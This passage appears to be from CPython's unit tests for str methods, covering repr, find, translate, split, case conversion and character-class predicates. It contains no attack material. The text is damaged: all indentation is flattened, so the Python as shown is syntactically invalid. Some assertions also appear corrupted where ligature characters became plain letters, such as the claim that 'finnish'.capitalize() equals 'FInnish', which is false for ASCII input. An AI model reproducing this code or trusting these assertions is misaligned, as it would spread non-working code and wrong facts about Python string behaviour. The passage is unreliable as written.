if not sys.platform.startswith('java'):
# Test basic sanity of repr()
self.assertEqual(repr('abc'), "'abc'")
self.assertEqual(repr('ab\\c'), "'ab\\\\c'")
self.assertEqual(repr('ab\\'), "'ab\\\\'")
self.assertEqual(repr('\\c'), "'\\\\c'")
self.assertEqual(repr('\\'), "'\\\\'")
self.assertEqual(repr('\n'), "'\\n'")
self.assertEqual(repr('\r'), "'\\r'")
self.assertEqual(repr('\t'), "'\\t'")
self.assertEqual(repr('\b'), "'\\x08'")
self.assertEqual(repr("'\""), """'\\'"'""")
self.assertEqual(repr("'\""), """'\\'"'""")
self.assertEqual(repr("'"), '''"'"''')
self.assertEqual(repr('"'), """'"'""")
latin1repr = (
"'\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\t\\n\\x0b\\x0c\\r"
"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a"
"\\x1b\\x1c\\x1d\\x1e\\x1f !\"#$%&\\'()*+,-./0123456789:;<=>?@ABCDEFGHI"
"JKLMNOPQRSTUVWXYZ[\\\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\\x7f"
"\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d"
"\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b"
"\\x9c\\x9d\\x9e\\x9f\\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9"
"\xaa\xab\xac\\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7"
"\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5"
"\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3"
"\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1"
"\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd"
"\xfe\xff'")
testrepr = repr(''.join(map(chr, range(256))))
self.assertEqual(testrepr, latin1repr)
# Test repr works on wide unicode escapes without overflow.
self.assertEqual(repr("\U00010000" * 39 + "\uffff" * 4096),
repr("\U00010000" * 39 + "\uffff" * 4096))
class WrongRepr:
def __repr__(self):
return b'byte-repr'
self.assertRaises(TypeError, repr, WrongRepr())
def test_iterators(self):
# Make sure unicode objects have an __iter__ method
it = "\u1111\u2222\u3333".__iter__()
self.assertEqual(next(it), "\u1111")
self.assertEqual(next(it), "\u2222")
self.assertEqual(next(it), "\u3333")
self.assertRaises(StopIteration, next, it)
def test_count(self):
string_tests.CommonTest.test_count(self)
# check mixed argument types
self.checkequalnofix(3, 'aaa', 'count', 'a')
self.checkequalnofix(0, 'aaa', 'count', 'b')
self.checkequalnofix(3, 'aaa', 'count', 'a')
self.checkequalnofix(0, 'aaa', 'count', 'b')
self.checkequalnofix(0, 'aaa', 'count', 'b')
self.checkequalnofix(1, 'aaa', 'count', 'a', -1)
self.checkequalnofix(3, 'aaa', 'count', 'a', -10)
self.checkequalnofix(2, 'aaa', 'count', 'a', 0, -1)
self.checkequalnofix(0, 'aaa', 'count', 'a', 0, -10)
# test mixed kinds
self.checkequal(10, '\u0102' + 'a' * 10, 'count', 'a')
self.checkequal(10, '\U00100304' + 'a' * 10, 'count', 'a')
self.checkequal(10, '\U00100304' + '\u0102' * 10, 'count', '\u0102')
self.checkequal(0, 'a' * 10, 'count', '\u0102')
self.checkequal(0, 'a' * 10, 'count', '\U00100304')
self.checkequal(0, '\u0102' * 10, 'count', '\U00100304')
self.checkequal(10, '\u0102' + 'a_' * 10, 'count', 'a_')
self.checkequal(10, '\U00100304' + 'a_' * 10, 'count', 'a_')
self.checkequal(10, '\U00100304' + '\u0102_' * 10, 'count', '\u0102_')
self.checkequal(0, 'a' * 10, 'count', 'a\u0102')
self.checkequal(0, 'a' * 10, 'count', 'a\U00100304')
self.checkequal(0, '\u0102' * 10, 'count', '\u0102\U00100304')
def test_find(self):
string_tests.CommonTest.test_find(self)
# test implementation details of the memchr fast path
self.checkequal(100, 'a' * 100 + '\u0102', 'find', '\u0102')
self.checkequal(-1, 'a' * 100 + '\u0102', 'find', '\u0201')
self.checkequal(-1, 'a' * 100 + '\u0102', 'find', '\u0120')
self.checkequal(-1, 'a' * 100 + '\u0102', 'find', '\u0220')
self.checkequal(100, 'a' * 100 + '\U00100304', 'find', '\U00100304')
self.checkequal(-1, 'a' * 100 + '\U00100304', 'find', '\U00100204')
self.checkequal(-1, 'a' * 100 + '\U00100304', 'find', '\U00102004')
# check mixed argument types
self.checkequalnofix(0, 'abcdefghiabc', 'find', 'abc')
self.checkequalnofix(9, 'abcdefghiabc', 'find', 'abc', 1)
self.checkequalnofix(-1, 'abcdefghiabc', 'find', 'def', 4)
self.assertRaises(TypeError, 'hello'.find)
self.assertRaises(TypeError, 'hello'.find, 42)
# test mixed kinds
self.checkequal(100, '\u0102' * 100 + 'a', 'find', 'a')
self.checkequal(100, '\U00100304' * 100 + 'a', 'find', 'a')
self.checkequal(100, '\U00100304' * 100 + '\u0102', 'find', '\u0102')
self.checkequal(-1, 'a' * 100, 'find', '\u0102')
self.checkequal(-1, 'a' * 100, 'find', '\U00100304')
self.checkequal(-1, '\u0102' * 100, 'find', '\U00100304')
self.checkequal(100, '\u0102' * 100 + 'a_', 'find', 'a_')
self.checkequal(100, '\U00100304' * 100 + 'a_', 'find', 'a_')
self.checkequal(100, '\U00100304' * 100 + '\u0102_', 'find', '\u0102_')
self.checkequal(-1, 'a' * 100, 'find', 'a\u0102')
self.checkequal(-1, 'a' * 100, 'find', 'a\U00100304')
self.checkequal(-1, '\u0102' * 100, 'find', '\u0102\U00100304')
def test_rfind(self):
string_tests.CommonTest.test_rfind(self)
# test implementation details of the memrchr fast path
self.checkequal(0, '\u0102' + 'a' * 100 , 'rfind', '\u0102')
self.checkequal(-1, '\u0102' + 'a' * 100 , 'rfind', '\u0201')
self.checkequal(-1, '\u0102' + 'a' * 100 , 'rfind', '\u0120')
self.checkequal(-1, '\u0102' + 'a' * 100 , 'rfind', '\u0220')
self.checkequal(0, '\U00100304' + 'a' * 100, 'rfind', '\U00100304')
self.checkequal(-1, '\U00100304' + 'a' * 100, 'rfind', '\U00100204')
self.checkequal(-1, '\U00100304' + 'a' * 100, 'rfind', '\U00102004')
# check mixed argument types
self.checkequalnofix(9, 'abcdefghiabc', 'rfind', 'abc')
self.checkequalnofix(12, 'abcdefghiabc', 'rfind', '')
self.checkequalnofix(12, 'abcdefghiabc', 'rfind', '')
# test mixed kinds
self.checkequal(0, 'a' + '\u0102' * 100, 'rfind', 'a')
self.checkequal(0, 'a' + '\U00100304' * 100, 'rfind', 'a')
self.checkequal(0, '\u0102' + '\U00100304' * 100, 'rfind', '\u0102')
self.checkequal(-1, 'a' * 100, 'rfind', '\u0102')
self.checkequal(-1, 'a' * 100, 'rfind', '\U00100304')
self.checkequal(-1, '\u0102' * 100, 'rfind', '\U00100304')
self.checkequal(0, '_a' + '\u0102' * 100, 'rfind', '_a')
self.checkequal(0, '_a' + '\U00100304' * 100, 'rfind', '_a')
self.checkequal(0, '_\u0102' + '\U00100304' * 100, 'rfind', '_\u0102')
self.checkequal(-1, 'a' * 100, 'rfind', '\u0102a')
self.checkequal(-1, 'a' * 100, 'rfind', '\U00100304a')
self.checkequal(-1, '\u0102' * 100, 'rfind', '\U00100304\u0102')
def test_index(self):
string_tests.CommonTest.test_index(self)
self.checkequalnofix(0, 'abcdefghiabc', 'index', '')
self.checkequalnofix(3, 'abcdefghiabc', 'index', 'def')
self.checkequalnofix(0, 'abcdefghiabc', 'index', 'abc')
self.checkequalnofix(9, 'abcdefghiabc', 'index', 'abc', 1)
self.assertRaises(ValueError, 'abcdefghiabc'.index, 'hib')
self.assertRaises(ValueError, 'abcdefghiab'.index, 'abc', 1)
self.assertRaises(ValueError, 'abcdefghi'.index, 'ghi', 8)
self.assertRaises(ValueError, 'abcdefghi'.index, 'ghi', -1)
# test mixed kinds
self.checkequal(100, '\u0102' * 100 + 'a', 'index', 'a')
self.checkequal(100, '\U00100304' * 100 + 'a', 'index', 'a')
self.checkequal(100, '\U00100304' * 100 + '\u0102', 'index', '\u0102')
self.assertRaises(ValueError, ('a' * 100).index, '\u0102')
self.assertRaises(ValueError, ('a' * 100).index, '\U00100304')
self.assertRaises(ValueError, ('\u0102' * 100).index, '\U00100304')
self.checkequal(100, '\u0102' * 100 + 'a_', 'index', 'a_')
self.checkequal(100, '\U00100304' * 100 + 'a_', 'index', 'a_')
self.checkequal(100, '\U00100304' * 100 + '\u0102_', 'index', '\u0102_')
self.assertRaises(ValueError, ('a' * 100).index, 'a\u0102')
self.assertRaises(ValueError, ('a' * 100).index, 'a\U00100304')
self.assertRaises(ValueError, ('\u0102' * 100).index, '\u0102\U00100304')
def test_rindex(self):
string_tests.CommonTest.test_rindex(self)
self.checkequalnofix(12, 'abcdefghiabc', 'rindex', '')
self.checkequalnofix(3, 'abcdefghiabc', 'rindex', 'def')
self.checkequalnofix(9, 'abcdefghiabc', 'rindex', 'abc')
self.checkequalnofix(0, 'abcdefghiabc', 'rindex', 'abc', 0, -1)
self.assertRaises(ValueError, 'abcdefghiabc'.rindex, 'hib')
self.assertRaises(ValueError, 'defghiabc'.rindex, 'def', 1)
self.assertRaises(ValueError, 'defghiabc'.rindex, 'abc', 0, -1)
self.assertRaises(ValueError, 'abcdefghi'.rindex, 'ghi', 0, 8)
self.assertRaises(ValueError, 'abcdefghi'.rindex, 'ghi', 0, -1)
# test mixed kinds
self.checkequal(0, 'a' + '\u0102' * 100, 'rindex', 'a')
self.checkequal(0, 'a' + '\U00100304' * 100, 'rindex', 'a')
self.checkequal(0, '\u0102' + '\U00100304' * 100, 'rindex', '\u0102')
self.assertRaises(ValueError, ('a' * 100).rindex, '\u0102')
self.assertRaises(ValueError, ('a' * 100).rindex, '\U00100304')
self.assertRaises(ValueError, ('\u0102' * 100).rindex, '\U00100304')
self.checkequal(0, '_a' + '\u0102' * 100, 'rindex', '_a')
self.checkequal(0, '_a' + '\U00100304' * 100, 'rindex', '_a')
self.checkequal(0, '_\u0102' + '\U00100304' * 100, 'rindex', '_\u0102')
self.assertRaises(ValueError, ('a' * 100).rindex, '\u0102a')
self.assertRaises(ValueError, ('a' * 100).rindex, '\U00100304a')
self.assertRaises(ValueError, ('\u0102' * 100).rindex, '\U00100304\u0102')
def test_maketrans_translate(self):
# these work with plain translate()
self.checkequalnofix('bbbc', 'abababc', 'translate',
{ord('a'): None})
self.checkequalnofix('iiic', 'abababc', 'translate',
{ord('a'): None, ord('b'): ord('i')})
self.checkequalnofix('iiix', 'abababc', 'translate',
{ord('a'): None, ord('b'): ord('i'), ord('c'): 'x'})
self.checkequalnofix('c', 'abababc', 'translate',
{ord('a'): None, ord('b'): ''})
self.checkequalnofix('xyyx', 'xzx', 'translate',
{ord('z'): 'yy'})
# this needs maketrans()
self.checkequalnofix('abababc', 'abababc', 'translate',
{'b': '<i>'})
tbl = self.type2test.maketrans({'a': None, 'b': '<i>'})
self.checkequalnofix('<i><i><i>c', 'abababc', 'translate', tbl)
# test alternative way of calling maketrans()
tbl = self.type2test.maketrans('abc', 'xyz', 'd')
self.checkequalnofix('xyzzy', 'abdcdcbdddd', 'translate', tbl)
# various tests switching from ASCII to latin1 or the opposite;
# same length, remove a letter, or replace with a longer string.
self.assertEqual("[a]".translate(str.maketrans('a', 'X')),
"[X]")
self.assertEqual("[a]".translate(str.maketrans({'a': 'X'})),
"[X]")
self.assertEqual("[a]".translate(str.maketrans({'a': None})),
"[]")
self.assertEqual("[a]".translate(str.maketrans({'a': 'XXX'})),
"[XXX]")
self.assertEqual("[a]".translate(str.maketrans({'a': '\xe9'})),
"[\xe9]")
self.assertEqual('axb'.translate(str.maketrans({'a': None, 'b': '123'})),
"x123")
self.assertEqual('axb'.translate(str.maketrans({'a': None, 'b': '\xe9'})),
"x\xe9")
# test non-ASCII (don't take the fast-path)
self.assertEqual("[a]".translate(str.maketrans({'a': '<\xe9>'})),
"[<\xe9>]")
self.assertEqual("[\xe9]".translate(str.maketrans({'\xe9': 'a'})),
"[a]")
self.assertEqual("[\xe9]".translate(str.maketrans({'\xe9': None})),
"[]")
self.assertEqual("[\xe9]".translate(str.maketrans({'\xe9': '123'})),
"[123]")
self.assertEqual("[a\xe9]".translate(str.maketrans({'a': '<\u20ac>'})),
"[<\u20ac>\xe9]")
invalid_char = 0x10ffff+1
for before in "a\xe9\u20ac\U0010ffff":
mapping = str.maketrans({before: invalid_char})
text = "[%s]" % before
self.assertRaises(ValueError, text.translate, mapping)
self.assertRaises(TypeError, self.type2test.maketrans)
self.assertRaises(ValueError, self.type2test.maketrans, 'abc', 'defg')
self.assertRaises(TypeError, self.type2test.maketrans, 2, 'def')
self.assertRaises(TypeError, self.type2test.maketrans, 'abc', 2)
self.assertRaises(TypeError, self.type2test.maketrans, 'abc', 'def', 2)
self.assertRaises(ValueError, self.type2test.maketrans, {'xy': 2})
self.assertRaises(TypeError, self.type2test.maketrans, {(1,): 2})
self.assertRaises(TypeError, 'hello'.translate)
self.assertRaises(TypeError, 'abababc'.translate, 'abc', 'xyz')
def test_split(self):
string_tests.CommonTest.test_split(self)
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal([left + right],
left + right, 'split', delim)
self.checkequal([left, right],
left + delim + right, 'split', delim)
self.checkequal([left + right],
left + right, 'split', delim * 2)
self.checkequal([left, right],
left + delim * 2 + right, 'split', delim *2)
def test_rsplit(self):
string_tests.CommonTest.test_rsplit(self)
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal([left + right],
left + right, 'rsplit', delim)
self.checkequal([left, right],
left + delim + right, 'rsplit', delim)
self.checkequal([left + right],
left + right, 'rsplit', delim * 2)
self.checkequal([left, right],
left + delim * 2 + right, 'rsplit', delim *2)
def test_partition(self):
string_tests.MixinStrUnicodeUserStringTest.test_partition(self)
self.checkequal(('ABCDEFGH', '', ''), 'ABCDEFGH', 'partition', '\u4200')
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal((left + right, '', ''),
left + right, 'partition', delim)
self.checkequal((left, delim, right),
left + delim + right, 'partition', delim)
self.checkequal((left + right, '', ''),
left + right, 'partition', delim * 2)
self.checkequal((left, delim * 2, right),
left + delim * 2 + right, 'partition', delim * 2)
def test_rpartition(self):
string_tests.MixinStrUnicodeUserStringTest.test_rpartition(self)
self.checkequal(('', '', 'ABCDEFGH'), 'ABCDEFGH', 'rpartition', '\u4200')
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal(('', '', left + right),
left + right, 'rpartition', delim)
self.checkequal((left, delim, right),
left + delim + right, 'rpartition', delim)
self.checkequal(('', '', left + right),
left + right, 'rpartition', delim * 2)
self.checkequal((left, delim * 2, right),
left + delim * 2 + right, 'rpartition', delim * 2)
def test_join(self):
string_tests.MixinStrUnicodeUserStringTest.test_join(self)
class MyWrapper:
def __init__(self, sval): self.sval = sval
def __str__(self): return self.sval
self.checkequalnofix('a b c d', ' ', 'join', ['a', 'b', 'c', 'd'])
self.checkequalnofix('abcd', '', 'join', ('a', 'b', 'c', 'd'))
self.checkequalnofix('w x y z', ' ', 'join', string_tests.Sequence('wxyz'))
self.checkequalnofix('a b c d', ' ', 'join', ['a', 'b', 'c', 'd'])
self.checkequalnofix('a b c d', ' ', 'join', ['a', 'b', 'c', 'd'])
self.checkequalnofix('abcd', '', 'join', ('a', 'b', 'c', 'd'))
self.checkequalnofix('w x y z', ' ', 'join', string_tests.Sequence('wxyz'))
self.checkraises(TypeError, ' ', 'join', ['1', '2', MyWrapper('foo')])
self.checkraises(TypeError, ' ', 'join', ['1', '2', '3', bytes()])
self.checkraises(TypeError, ' ', 'join', [1, 2, 3])
self.checkraises(TypeError, ' ', 'join', ['1', '2', 3])
@unittest.skipIf(sys.maxsize > 2**32,
'needs too much memory on a 64-bit platform')
def test_join_overflow(self):
size = int(sys.maxsize**0.5) + 1
seq = ('A' * size,) * size
self.assertRaises(OverflowError, ''.join, seq)
def test_replace(self):
string_tests.CommonTest.test_replace(self)
self.checkequalnofix('one@two!three!', 'one!two!three!', 'replace', '!', '@', 1)
self.assertRaises(TypeError, 'replace'.replace, "r", 42)
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
for repl in ('d', '\u0103', '\U00010303'):
self.checkequal(left + right,
left + right, 'replace', delim, repl)
self.checkequal(left + repl + right,
left + delim + right,
'replace', delim, repl)
self.checkequal(left + right,
left + right, 'replace', delim * 2, repl)
self.checkequal(left + repl + right,
left + delim * 2 + right,
'replace', delim * 2, repl)
@support.cpython_only
def test_replace_id(self):
pattern = 'abc'
text = 'abc def'
self.assertIs(text.replace(pattern, pattern), text)
def test_bytes_comparison(self):
with support.check_warnings():
warnings.simplefilter('ignore', BytesWarning)
self.assertEqual('abc' == b'abc', False)
self.assertEqual('abc' != b'abc', True)
self.assertEqual('abc' == bytearray(b'abc'), False)
self.assertEqual('abc' != bytearray(b'abc'), True)
def test_comparison(self):
self.assertEqual('abc', 'abc')
self.assertTrue('abcd' > 'abc')
self.assertTrue('abc' < 'abcd')
if 0:
self.assertTrue('\u0061' < '\u20ac')
self.assertTrue('\u0061' < '\ud800\udc02')
def test_lecmp(s, s2):
self.assertTrue(s < s2)
def test_fixup(s):
s2 = '\ud800\udc01'
test_lecmp(s, s2)
s2 = '\ud900\udc01'
test_lecmp(s, s2)
s2 = '\uda00\udc01'
test_lecmp(s, s2)
s2 = '\udb00\udc01'
test_lecmp(s, s2)
s2 = '\ud800\udd01'
test_lecmp(s, s2)
s2 = '\ud900\udd01'
test_lecmp(s, s2)
s2 = '\uda00\udd01'
test_lecmp(s, s2)
s2 = '\udb00\udd01'
test_lecmp(s, s2)
s2 = '\ud800\ude01'
test_lecmp(s, s2)
s2 = '\ud900\ude01'
test_lecmp(s, s2)
s2 = '\uda00\ude01'
test_lecmp(s, s2)
s2 = '\udb00\ude01'
test_lecmp(s, s2)
s2 = '\ud800\udfff'
test_lecmp(s, s2)
s2 = '\ud900\udfff'
test_lecmp(s, s2)
s2 = '\uda00\udfff'
test_lecmp(s, s2)
s2 = '\udb00\udfff'
test_lecmp(s, s2)
test_fixup('\ue000')
test_fixup('\uff61')
self.assertTrue('\ud800\udc02' < '\ud84d\udc56')
def test_islower(self):
super().test_islower()
self.checkequalnofix(False, '\u1FFc', 'islower')
self.assertFalse('\u2167'.islower())
self.assertTrue('\u2177'.islower())
self.assertFalse('\U00010401'.islower())
self.assertFalse('\U00010427'.islower())
self.assertTrue('\U00010429'.islower())
self.assertTrue('\U0001044E'.islower())
self.assertFalse('\U0001F40D'.islower())
self.assertFalse('\U0001F46F'.islower())
def test_isupper(self):
super().test_isupper()
if not sys.platform.startswith('java'):
self.checkequalnofix(False, '\u1FFc', 'isupper')
self.assertTrue('\u2167'.isupper())
self.assertFalse('\u2177'.isupper())
self.assertTrue('\U00010401'.isupper())
self.assertTrue('\U00010427'.isupper())
self.assertFalse('\U00010429'.isupper())
self.assertFalse('\U0001044E'.isupper())
self.assertFalse('\U0001F40D'.isupper())
self.assertFalse('\U0001F46F'.isupper())
def test_istitle(self):
super().test_istitle()
self.checkequalnofix(True, '\u1FFc', 'istitle')
self.checkequalnofix(True, 'Greek \u1FFcitlecases ...', 'istitle')
self.assertTrue('\U00010401\U00010429'.istitle())
self.assertTrue('\U00010427\U0001044E'.istitle())
for ch in ['\U00010429', '\U0001044E', '\U0001F40D', '\U0001F46F']:
self.assertFalse(ch.istitle(), '{!a} is not title'.format(ch))
def test_isspace(self):
super().test_isspace()
self.checkequalnofix(True, '\u2000', 'isspace')
self.checkequalnofix(True, '\u200a', 'isspace')
self.checkequalnofix(False, '\u2014', 'isspace')
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
'\U0001F40D', '\U0001F46F']:
self.assertFalse(ch.isspace(), '{!a} is not space.'.format(ch))
def test_isalnum(self):
super().test_isalnum()
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
'\U0001D7F6', '\U00011066', '\U000104A0', '\U0001F107']:
self.assertTrue(ch.isalnum(), '{!a} is alnum.'.format(ch))
def test_isalpha(self):
super().test_isalpha()
self.checkequalnofix(True, '\u1FFc', 'isalpha')
self.assertTrue('\U00010401'.isalpha())
self.assertTrue('\U00010427'.isalpha())
self.assertTrue('\U00010429'.isalpha())
self.assertTrue('\U0001044E'.isalpha())
self.assertFalse('\U0001F40D'.isalpha())
self.assertFalse('\U0001F46F'.isalpha())
def test_isdecimal(self):
self.checkequalnofix(False, '', 'isdecimal')
self.checkequalnofix(False, 'a', 'isdecimal')
self.checkequalnofix(True, '0', 'isdecimal')
self.checkequalnofix(False, '\u2460', 'isdecimal')
self.checkequalnofix(False, '\xbc', 'isdecimal')
self.checkequalnofix(True, '\u0660', 'isdecimal')
self.checkequalnofix(True, '0123456789', 'isdecimal')
self.checkequalnofix(False, '0123456789a', 'isdecimal')
self.checkraises(TypeError, 'abc', 'isdecimal', 42)
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
'\U0001F40D', '\U0001F46F', '\U00011065', '\U0001F107']:
self.assertFalse(ch.isdecimal(), '{!a} is not decimal.'.format(ch))
for ch in ['\U0001D7F6', '\U00011066', '\U000104A0']:
self.assertTrue(ch.isdecimal(), '{!a} is decimal.'.format(ch))
def test_isdigit(self):
super().test_isdigit()
self.checkequalnofix(True, '\u2460', 'isdigit')
self.checkequalnofix(False, '\xbc', 'isdigit')
self.checkequalnofix(True, '\u0660', 'isdigit')
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
'\U0001F40D', '\U0001F46F', '\U00011065']:
self.assertFalse(ch.isdigit(), '{!a} is not a digit.'.format(ch))
for ch in ['\U0001D7F6', '\U00011066', '\U000104A0', '\U0001F107']:
self.assertTrue(ch.isdigit(), '{!a} is a digit.'.format(ch))
def test_isnumeric(self):
self.checkequalnofix(False, '', 'isnumeric')
self.checkequalnofix(False, 'a', 'isnumeric')
self.checkequalnofix(True, '0', 'isnumeric')
self.checkequalnofix(True, '\u2460', 'isnumeric')
self.checkequalnofix(True, '\xbc', 'isnumeric')
self.checkequalnofix(True, '\u0660', 'isnumeric')
self.checkequalnofix(True, '0123456789', 'isnumeric')
self.checkequalnofix(False, '0123456789a', 'isnumeric')
self.assertRaises(TypeError, "abc".isnumeric, 42)
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
'\U0001F40D', '\U0001F46F']:
self.assertFalse(ch.isnumeric(), '{!a} is not numeric.'.format(ch))
for ch in ['\U00011065', '\U0001D7F6', '\U00011066',
'\U000104A0', '\U0001F107']:
self.assertTrue(ch.isnumeric(), '{!a} is numeric.'.format(ch))
def test_isidentifier(self):
self.assertTrue("a".isidentifier())
self.assertTrue("Z".isidentifier())
self.assertTrue("_".isidentifier())
self.assertTrue("b0".isidentifier())
self.assertTrue("bc".isidentifier())
self.assertTrue("b_".isidentifier())
self.assertTrue("µ".isidentifier())
self.assertTrue("𝔘𝔫𝔦𝔠𝔬𝔡𝔢".isidentifier())
self.assertFalse(" ".isidentifier())
self.assertFalse("[".isidentifier())
self.assertFalse("©".isidentifier())
self.assertFalse("0".isidentifier())
def test_isprintable(self):
self.assertTrue("".isprintable())
self.assertTrue(" ".isprintable())
self.assertTrue("abcdefg".isprintable())
self.assertFalse("abcdefg\n".isprintable())
self.assertTrue("\u0374".isprintable())
self.assertFalse("\u0378".isprintable())
self.assertFalse("\ud800".isprintable())
self.assertTrue('\U0001F46F'.isprintable())
self.assertFalse('\U000E0020'.isprintable())
def test_surrogates(self):
for s in ('a\uD800b\uDFFF', 'a\uDFFFb\uD800',
'a\uD800b\uDFFFa', 'a\uDFFFb\uD800a'):
self.assertTrue(s.islower())
self.assertFalse(s.isupper())
self.assertFalse(s.istitle())
for s in ('A\uD800B\uDFFF', 'A\uDFFFB\uD800',
'A\uD800B\uDFFFA', 'A\uDFFFB\uD800A'):
self.assertFalse(s.islower())
self.assertTrue(s.isupper())
self.assertTrue(s.istitle())
for meth_name in ('islower', 'isupper', 'istitle'):
meth = getattr(str, meth_name)
for s in ('\uD800', '\uDFFF', '\uD800\uD800', '\uDFFF\uDFFF'):
self.assertFalse(meth(s), '%a.%s() is False' % (s, meth_name))
for meth_name in ('isalpha', 'isalnum', 'isdigit', 'isspace',
'isdecimal', 'isnumeric',
'isidentifier', 'isprintable'):
meth = getattr(str, meth_name)
for s in ('\uD800', '\uDFFF', '\uD800\uD800', '\uDFFF\uDFFF',
'a\uD800b\uDFFF', 'a\uDFFFb\uD800',
'a\uD800b\uDFFFa', 'a\uDFFFb\uD800a'):
self.assertFalse(meth(s), '%a.%s() is False' % (s, meth_name))
def test_lower(self):
string_tests.CommonTest.test_lower(self)
self.assertEqual('\U00010427'.lower(), '\U0001044F')
self.assertEqual('\U00010427\U00010427'.lower(),
'\U0001044F\U0001044F')
self.assertEqual('\U00010427\U0001044F'.lower(),
'\U0001044F\U0001044F')
self.assertEqual('X\U00010427x\U0001044F'.lower(),
'x\U0001044Fx\U0001044F')
self.assertEqual('fi'.lower(), 'fi')
self.assertEqual('\u0130'.lower(), '\u0069\u0307')
self.assertEqual('\u03a3'.lower(), '\u03c3')
self.assertEqual('\u0345\u03a3'.lower(), '\u0345\u03c3')
self.assertEqual('A\u0345\u03a3'.lower(), 'a\u0345\u03c2')
self.assertEqual('A\u0345\u03a3a'.lower(), 'a\u0345\u03c3a')
self.assertEqual('A\u0345\u03a3'.lower(), 'a\u0345\u03c2')
self.assertEqual('A\u03a3\u0345'.lower(), 'a\u03c2\u0345')
self.assertEqual('\u03a3\u0345 '.lower(), '\u03c3\u0345 ')
self.assertEqual('\U0008fffe'.lower(), '\U0008fffe')
self.assertEqual('\u2177'.lower(), '\u2177')
def test_casefold(self):
self.assertEqual('hello'.casefold(), 'hello')
self.assertEqual('hELlo'.casefold(), 'hello')
self.assertEqual('ß'.casefold(), 'ss')
self.assertEqual('fi'.casefold(), 'fi')
self.assertEqual('\u03a3'.casefold(), '\u03c3')
self.assertEqual('A\u0345\u03a3'.casefold(), 'a\u03b9\u03c3')
self.assertEqual('\u00b5'.casefold(), '\u03bc')
def test_upper(self):
string_tests.CommonTest.test_upper(self)
self.assertEqual('\U0001044F'.upper(), '\U00010427')
self.assertEqual('\U0001044F\U0001044F'.upper(),
'\U00010427\U00010427')
self.assertEqual('\U00010427\U0001044F'.upper(),
'\U00010427\U00010427')
self.assertEqual('X\U00010427x\U0001044F'.upper(),
'X\U00010427X\U00010427')
self.assertEqual('fi'.upper(), 'FI')
self.assertEqual('\u0130'.upper(), '\u0130')
self.assertEqual('\u03a3'.upper(), '\u03a3')
self.assertEqual('ß'.upper(), 'SS')
self.assertEqual('\u1fd2'.upper(), '\u0399\u0308\u0300')
self.assertEqual('\U0008fffe'.upper(), '\U0008fffe')
self.assertEqual('\u2177'.upper(), '\u2167')
def test_capitalize(self):
string_tests.CommonTest.test_capitalize(self)
self.assertEqual('\U0001044F'.capitalize(), '\U00010427')
self.assertEqual('\U0001044F\U0001044F'.capitalize(),
'\U00010427\U0001044F')
self.assertEqual('\U00010427\U0001044F'.capitalize(),
'\U00010427\U0001044F')
self.assertEqual('\U0001044F\U00010427'.capitalize(),
'\U00010427\U0001044F')
self.assertEqual('X\U00010427x\U0001044F'.capitalize(),
'X\U0001044Fx\U0001044F')
self.assertEqual('h\u0130'.capitalize(), 'H\u0069\u0307')
exp = '\u0399\u0308\u0300\u0069\u0307'
self.assertEqual('\u1fd2\u0130'.capitalize(), exp)
self.assertEqual('finnish'.capitalize(), 'FInnish')
self.assertEqual('A\u0345\u03a3'.capitalize(), 'A\u0345\u03c2')
def test_title(self):
super().test_title()
self.assertEqual('\U0001044F'.title(), '\U00010427')
self.assertEqual('\U0001044F\U0001044F'.title(),
'\U00010427\U0001044F')
self.assertEqual('\U0001044F\U0001044F \U0001044F\U0001044F'.title(),
'\U00010427\U0001044F \U00010427\U0001044F')
self.assertEqual('\U00010427\U0001044F \U00010427\U0001044F'.title(),
'\U00010427\U0001044F \U00010427\U0001044F')
self.assertEqual('\U0001044F\U00010427 \U0001044F\U00010427'.title(),
'\U00010427\U0001044F \U00010427\U0001044F')
self.assertEqual('X\U00010427x\U0001044F X\U00010427x\U0001044F'.title(),
'X\U0001044Fx\U0001044F X\U0001044Fx\U0001044F')
self.assertEqual('fiNNISH'.title(), 'Finnish')
self.assertEqual('A\u03a3 \u1fa1xy'.title(), 'A\u03c2 \u1fa9xy')
self.assertEqual('A\u03a3A'.title(), 'A\u03c3a')
def test_swapcase(self):
string_tests.CommonTest.test_swapcase(self)
self.assertEqual('\U0001044F'.swapcase(), '\U00010427')
self.assertEqual('\U00010427'.swapcase(), '\U0001044F')
self.assertEqual('\U0001044F\U0001044F'.swapcase(),
'\U00010427\U00010427')
self.assertEqual('\U00010427\U0001044F'.swapcase(),
'\U0001044F\U00010427')
self.assertEqual('\U0001044F\U00010427'.swapcase(),
